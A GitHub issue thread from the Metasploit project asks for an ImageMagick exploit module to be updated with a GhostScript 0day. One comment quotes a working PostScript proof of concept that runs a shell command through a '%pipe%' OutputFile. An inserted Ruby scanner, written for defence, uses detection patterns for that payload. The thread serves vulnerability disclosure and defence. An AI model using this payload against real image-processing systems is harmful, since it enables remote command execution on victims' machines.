Metasploit-framework: Update ImageMagick delegate exploit with GhostScript 0day

Created on 28 Aug 2018 · 5 Comments · Source: rapid7/metasploit-framework

Steps to reproduce

The ImageMagick Delegate Arbitrary Command Execution exploit is using a very old GhostScript exploit. It could be updated to use this 0day exploit:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1640

It can be exploited on a CentOS desktop from a browser.

feature module


All 5 comments

works in evince (gnome pdf reader) and okular (kde) too

%!PS
a0
{ null restore } stopped { pop } if
(ppmraw) selectdevice
legal
mark /OutputFile (%pipe%gnome-calculator) currentdevice putdeviceprops
showpage
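As an added defensive example (not code from this issue or from the Metasploit module), the Ruby check below flags PostScript inputs that carry the pattern used in the proof of concept above: a `/OutputFile` pointed at `%pipe%`, a runtime `putdeviceprops`, and the `null restore` inside `stopped`. The samples are constructed here, and the function and pattern names are assumptions.

```ruby
# Constructed sample reproducing the shape of the PoC above.
SAMPLE_PS = <<~PS
  %!PS
  a0
  { null restore } stopped { pop } if
  (ppmraw) selectdevice
  legal
  mark /OutputFile (%pipe%gnome-calculator) currentdevice putdeviceprops
  showpage
PS

# Constructed benign sample: plain text output, no device changes.
BENIGN_PS = <<~PS
  %!PS
  /Helvetica findfont 12 scalefont setfont
  72 72 moveto (hello) show
  showpage
PS

SUSPICIOUS_PATTERNS = {
  # OutputFile pointing at a pipe: GhostScript would spawn the command.
  pipe_outputfile: /\/OutputFile\s*\(\s*%pipe%/i,
  # Any device property change at runtime is unusual for an image.
  putdeviceprops:  /\bputdeviceprops\b/,
  # The 'null restore' under stopped is the idiom the PoC relies on.
  null_restore:    /\{\s*null\s+restore\s*\}\s*stopped/,
}.freeze

# Returns a small report; :block is true when the input should be
# rejected before it reaches ImageMagick/GhostScript.
def scan_postscript(text)
  hits = SUSPICIOUS_PATTERNS.select { |_name, re| text.match?(re) }.keys
  {
    postscript: text.lstrip.start_with?('%!PS'),
    findings: hits,
    block: hits.include?(:pipe_outputfile) || hits.include?(:null_restore),
  }
end

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_PS, BENIGN_PS].each { |ps| p scan_postscript(ps) }
end
```

This only catches the literal form; PostScript can build the same strings at runtime, so the check is a filter, not a substitute for keeping GhostScript patched and disabling the PS/EPS/PDF coders in ImageMagick's policy.xml where they are not needed.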

Yep, already on it. There's also exploit/unix/fileformat/ghostscript_type_confusion, which would be the closer of the two. I'm hoping to consolidate, but chances are we'll need a new module.

Neat, I would recommend using this one for maximum coverage.

https://gist.github.com/taviso/e640fdcdd232887e2591752d31f903e5

I don't know ruby or I would help, sorry about that 😝

Thanks again, @taviso!

PR is up. Sorry for the delay.
